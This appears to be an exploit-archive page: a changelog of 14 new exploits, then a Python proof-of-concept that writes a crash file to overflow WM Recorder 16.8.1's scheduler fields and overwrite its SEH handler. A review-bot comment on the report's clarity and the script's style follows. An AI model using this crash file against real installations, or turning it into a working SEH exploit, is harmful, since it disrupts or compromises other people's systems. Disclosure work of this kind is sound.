
14 changes to exploits/shellcodes

Android Bluetooth - BNEP bnep_data_ind() Remote Heap Disclosure
Android Bluetooth - BNEP BNEP_SETUP_CONNECTION_REQUEST_MSG Out-of-Bounds Read
Dell EMC NetWorker - Denial of Service
WM Recorder 16.8.1 - Denial of Service
Easy Avi Divx Xvid to DVD Burner 2.9.11 - '.avi' Denial of Service
Allok Quicktime to AVI MPEG DVD Converter 4.6.1217 - Stack-Based Buffer Overflow
Crashmail 1.6 - Stack-Based Buffer Overflow ( ROP execve )
Easy CD DVD Copy 1.3.24 - Local Buffer Overflow (SEH)
Hikvision IP Camera versions 5.2.0 - 5.3.9 (Builds 140721 - 170109) - Access Control Bypass
TL-WR720N 150Mbps Wireless N Router - Cross-Site Request Forgery
XenForo 2 - CSS Loader Denial of Service
MyBB Plugin Last User's Threads in Profile Plugin 1.2 - Persistent Cross-Site Scripting
Wordpress Plugin Site Editor 1.1.1 - Local File Inclusion
Linux/x86 - EggHunter Shellcode (11 Bytes)
37 lines
No EOL
951 B
Python
Executable file
#!/usr/bin/python

#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: WM Recorder 16.8.1 - Denial of Service
# Date: 03-20-2018
# Vulnerable Software: WM Recorder 16.8.1
# Vendor Homepage: http://wmrecorder.com/home/
# Version: 16.8.1
# Software Link: http://wmrecorder.com/download/wm-recorder/
# Tested On: Windows 7 x86/x64, Windows 10 x64
#
#
# PoC: generate crash.txt, open app, go to Schedule Recordings, Open Scheduler, paste crash.txt contents in Stream URL, File name and Website URL,
# change End Recording date to future date, turn scheduler on, select OK
#
# app crashes & EIP overwrite;
# !mona seh > no ppr pointers & !mona seh -all > all aslr/safeseh
# lots of bad chars including \x90
#

filename="crash.txt"

junk = "\x41"*429

nseh = "\x42"*4

seh = "\x43"*4

fill = "\x44"*9562

buffer = junk + nseh + seh + fill

textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
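Review bot: The header comments are inconsistent about impact: the title line says "Denial of Service" while the notes further down record "app crashes & EIP overwrite", and the only explanation for the lower rating is the debugger shorthand in the `!mona seh` line. Anyone triaging from the title alone will under-read this, so please add one plain sentence stating that control data is overwritten and that the DoS classification rests on the SafeSEH/ASLR observation. The PoC steps also name three fields (Stream URL, File name, Website URL) without saying which one is responsible for the crash, which makes the report harder to turn into a fix or a regression test. Two smaller points on the script body: `#!/usr/bin/python` does not pin an interpreter version, and the `open(filename , 'w')` / `textfile.close()` pair would be safer as a `with open(...) as textfile:` block so the handle is closed if the write fails.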